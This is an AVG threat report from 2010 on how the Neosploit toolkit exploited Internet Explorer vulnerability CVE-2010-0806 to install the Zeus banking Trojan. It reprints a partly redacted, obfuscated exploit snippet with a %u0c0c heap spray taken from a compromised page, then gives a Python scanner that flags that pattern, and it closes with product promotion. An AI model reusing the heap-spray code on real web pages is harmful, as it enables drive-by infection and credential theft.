
AVG

WEB INTELLIGENCE REPORT

APRIL 2010

THE EPIDEMIC OF CVE-2010-0806 FOLLOWING A PUBLIC DISCLOSURE


Introduction
Cybercriminals keep targeting innocent online users. They refine their methods and search for new ways to
maximize their illegal profit while minimizing their chance of detection. In this report, we show how hackers
managed to infect computers with their malware by taking advantage of an unpatched Internet Explorer
vulnerability (zero-day) that had been disclosed to the public. We expose the epidemic of this zero-day
vulnerability on the web and the impact it has on users who browse the web without protection.

Our research shows that public disclosure of information about an unpatched vulnerability (zero-day) leads to a swift
response by hackers. The disclosed information was embedded in an exploit toolkit known as Neosploit and used by
several cybercriminal gangs around the globe. The Neosploit exploit toolkit is software written by hackers and sold online
to cybercriminals, who use it to infect innocent web users with their malware. The toolkit includes everything the
cybercriminal needs to operate the attack – the malware, the exploit code, the statistical reports, etc.

How did these cybercriminals find the information about the unpatched vulnerability? What means and
methods did they use to infect users? What is the epidemic rate of this attack? What can users do to
protect their digital assets?

In this report, we shed some light on these questions, including the cybercrime toolkits the attackers used.

CVE-2010-0806 and Public Disclosure
On March 9th Microsoft released an advisory regarding a vulnerability in its Internet Explorer products, versions 6
and 7. According to the information provided in this advisory, the vulnerability could allow remote code execution
(RCE). RCE means that an attacker who successfully exploits this vulnerability could gain the same user rights as the
logged-on user. For example, if the user is logged on with administrative user rights, an attacker who successfully
exploits this vulnerability could take complete control of the infected system. The attacker could then install
programs; view, change, or delete data; or create new accounts with full user rights.

Following the Microsoft advisory, CVE-2010-0806 was published to alert the public to the existence of such a
vulnerability.

Typically, public vulnerability disclosures trigger security researchers to rush in and find out ‘what is under the
hood’. The race to find exactly where the vulnerability lies and how to exploit it was the obvious next step. The
‘race’ ended with a report from a security researcher who found a site already exploiting this vulnerability and
used it to create a public Proof-of-Concept (PoC) and a module for the popular open-source penetration testing
platform, Metasploit.

The debate as to whether such public disclosure is valuable to the security community has been going on for
years. Some claim it helps the community provide immediate protection against threats, while others claim it
helps cybercriminals launch their attacks. We believe responsible disclosure within the security community is the
better way to go.

The Epidemic of the Vulnerability as Detected by AVG

Not long after the PoC was published on the web, AVG spotted a major spike in compromised websites serving
exploit code targeting the zero-day vulnerability. Our research concluded that the exploit was being served by
an exploit toolkit dubbed “Neosploit”. Neosploit had been known for some time already; however, its price on the
black market had started to decline because of the relatively old vulnerabilities it tried to exploit. It appears that the
people behind ‘Neosploit’ added this new exploit to the toolkit’s arsenal to increase its ‘market price’ again.

[Figure: Number of exploit serving websites following the public disclosure. Y axis: Number of Hits; X axis: Days from MS Advisory (1 to 8)]


Example of Compromised Website Serving the Exploit

Many users believe they can tell whether a website is legitimate or malicious just by visiting it.

There are two false assumptions behind this belief:

1. Today’s malicious code is invisible to users. Usually it is code embedded in the web page that executes behind
the scenes while the user simply visits the page. This is known as a ‘drive-by’ download.

2. Hackers compromise legitimate websites and insert their malicious code into them. The reason is simple:
users visit legitimate sites more often than other sites.

Below is an example of a compromised website we spotted that automatically attempts to infect the user with an exploit.
Can you tell whether this site is legitimate or one that serves malicious code? Probably not.

Here is the code behind this web page ….

As you can see at the bottom of the page, the hacker who compromised this website inserted code that tries to infect the
user – this was almost certainly not part of the original code the website owner intended to have.

For security researchers the highlighted code is very common, but to the average web developer it will look suspicious or
unfamiliar.

To minimize detection of the exploit code by security products, the hackers tried to hide their actions. The served
exploit code in this example was obfuscated. The main reason for obfuscating the code is to avoid detection by the
traditional signature matching techniques used by security products.

<html><head><script>if (!self.self.navigator["taintEn" + "abled"]()) ue = unescape;
s = new Function(ue('%76%61%72%20%62%74%6E%20%3D%20%64%6F%63%75%6D%65%6E%74[REMOVED]%2E%63%72%65%61%74%65%45%6C%65%6D
%65%6E%6F%6E%22%29%3B%20%62%74%6E%2Ess = new Function('var c = ue("%u9090%[--REMOVED--]%u0000"); var array = new Array(); var ls = 0x86000 -
(c.length * 2); var b = ue("%u0c0c%u0c0C"); while (b.length < ls / 2) {b += b;} var lh = b.substring(0, ls / 2); delete b; for (i = 0; i < 270; i++) {array[i] = lh + lh + c;}');
hnd = new Function(ue('%73%73%28%29%3B%20%76%61%72%20%62%64%20%3D%20%64[REMOVED]%6F%63%75%6D%65%6E%74%2E
%63%72%65%61%74%654F%44%59%22%29%3B69%%7B%7D%20%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%20%2B%3D%20%22%22%3B'));
</script></head><body onload="s()"></body></html>

Code snippet of Neosploit version for CVE-2010-0806.
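The obfuscation pattern in the snippet above (an escaped string literal decoded with unescape and turned into a function, plus a string-doubling loop that fills memory with a repeated 16-bit unit) can be scored structurally rather than by signature, which is the point the report makes about signature matching. The following Python scanner is an added example written for this report's readers; it is not AVG's code and not part of any Neosploit component. It decodes %XX and %uXXXX escapes the way JavaScript's unescape() does and flags a script that shows two or more of those structural indicators. The HTML samples are constructed for the example, and the decoded payload in the suspicious sample is a harmless one-line statement, not exploit code.

```python
import re
from typing import Dict, List

# The two escape forms JavaScript's unescape() understands: %uXXXX and %XX
_ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
# new Function(<alias>('%...  : a function body built from an escaped literal
_FUNC_FROM_ESC_RE = re.compile(r"new\s+Function\s*\(\s*\w+\s*\(\s*['\"]%")
# while (x.length < N) ... : a loop that keeps doubling a string
_GROWTH_LOOP_RE = re.compile(r"while\s*\([^)]*\.length\s*<")
# The same 16-bit unit repeated back to back, e.g. %u0c0c%u0c0c (input lowercased first)
_REPEATED_UNIT_RE = re.compile(r"(%u[0-9a-f]{4})\1")
_SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def decode_js_escapes(text: str) -> str:
    """Decode %uXXXX and %XX sequences the way JavaScript's unescape() does."""
    def repl(m: "re.Match[str]") -> str:
        code = m.group(1) or m.group(2)
        return chr(int(code, 16))
    return _ESC_RE.sub(repl, text)


def escaped_fraction(js: str) -> float:
    """Share of the script text that consists of percent-escape sequences."""
    if not js:
        return 0.0
    encoded = sum(len(m.group(0)) for m in _ESC_RE.finditer(js))
    return encoded / len(js)


def score_script(js: str) -> Dict[str, object]:
    """Score one <script> body on structural obfuscation indicators."""
    indicators = {
        "mostly_percent_encoded": escaped_fraction(js) > 0.3,
        "function_built_from_escaped_string": bool(_FUNC_FROM_ESC_RE.search(js)),
        "repeated_unicode_unit": bool(_REPEATED_UNIT_RE.search(js.lower())),
        "string_growth_loop": bool(_GROWTH_LOOP_RE.search(js)),
    }
    hits = sum(indicators.values())
    return {
        "indicators": indicators,
        "hits": hits,
        "suspicious": hits >= 2,  # assumed threshold: two independent indicators
        "decoded": decode_js_escapes(js),  # what unescape() would hand to Function()
    }


def scan_html(html: str) -> List[Dict[str, object]]:
    """Extract every <script> block from an HTML page and score each one."""
    return [score_script(js) for js in _SCRIPT_RE.findall(html)]


# Constructed sample: same structure as the report's snippet, harmless decoded payload
_ENCODED_BODY = "".join("%%%02X" % b for b in b"var btn = document.createElement('button');")
SAMPLE_SUSPICIOUS = (
    "<html><head><script>ue = unescape; "
    "s = new Function(ue('" + _ENCODED_BODY + "')); "
    'b = ue("%u0c0c%u0c0c"); while (b.length < 0x40000) { b += b; }'
    '</script></head><body onload="s()"></body></html>'
)
# Constructed sample: ordinary use of unescape() on a short query string
SAMPLE_BENIGN = (
    '<html><head><script>var q = unescape("%3Fa%3D1"); document.title = q;'
    "</script></head><body></body></html>"
)

if __name__ == "__main__":
    for name, page in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        for finding in scan_html(page):
            print(name, "hits=%d suspicious=%s" % (finding["hits"], finding["suspicious"]))
            print("  indicators:", finding["indicators"])
            print("  decoded:", finding["decoded"][:80])
```

The scanner deliberately does not key on any literal byte sequence from the exploit: a new Neosploit build with a different payload string would still trip the same indicators, because the structure (escaped literal fed to Function(), a string that grows by doubling, a repeated 16-bit unit) is what the obfuscation needs to work. In practice the decoded text would be fed to a second stage (a proxy or a browser-side inspector), since the first unescape() layer often hides only the names that a signature would otherwise catch.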


The Malicious Code Hackers Tried to Install on the End-user PC

Infecting legitimate websites and serving code that exploits the CVE-2010-0806 unpatched (zero-day) vulnerability was not
the main motivation of the hackers. They were looking to achieve another goal – to run password-stealing malware on the
end user’s PC. This password-stealing malware focuses on stealing the users’ online banking credentials. The
malware used in the cases we investigated was the well-known Zeus banking Trojan.

Screenshot taken from the Zeus Tracker website, indicating the served malware

How Can Users be Protected from These Attacks?
As indicated above, if attacks are designed to avoid detection by security products, how can security products provide
protection?

This is a common question asked by many users, and the answer is simple: by using multiple security layers. Multiple
protection layers enhance security because each layer focuses on a different area than the others.

At AVG Technologies we have several layers that can detect such attacks, in real-time, by using:
1. Exploit detection layer using AVG LinkScanner
2. Code behavior layer using AVG IDP Engine
3. Heuristics analysis
4. Incoming and outgoing traffic inspection by AVG Firewall
5. URL reputation by AVG Data Feed
6. …and the traditional signature-based detection by AVG Anti-Virus

Blending together these six different protection layers, and not relying on just one layer (e.g. signatures), is our approach
to protecting against today’s web attacks. Below are two examples showing how AVG’s security product successfully
detected and prevented both the exploit code and the actual malware used by the hacker.

The first is an example taken from AVG’s backend system. AVG LinkScanner reports back to our backend on each exploit it
detects on web pages that our users visit. Based on the data in this system we have real-time visibility into the
state of the Web, and we can identify new attacks worldwide. The screenshot below shows a site using Neosploit and
attempting to exploit the end user’s browser in order to deliver the password-stealing malware called Zeus.

The second example is a report from VirusTotal, indicating that AVG’s heuristics-based detection managed to detect the
served malware as well.

In this report we have visualized what happens between the time a vulnerability is discovered and used by hackers in-
the-wild and the time a security patch becomes available from the product vendor. Knowing that users’ PCs are vulnerable, hackers
rush to ‘color’ the Web with their attacks. Even non-technical hackers can join the ‘party’ by distributing the exploits using
readily available attack toolkit software packages.

Cybercriminals use this window of time to infect PCs and steal valuable personal, financial and business data that they can use or
trade for profit. The critical time puts a strain on users looking to protect their assets.

We at AVG Technologies provide users with a FREE product that detects and prevents such zero-day exploits, even when the patch
is not yet available. Thanks to our 6 layers of protection and our unique LinkScanner exploit detection, users can protect their PCs
and minimize their risk while online.
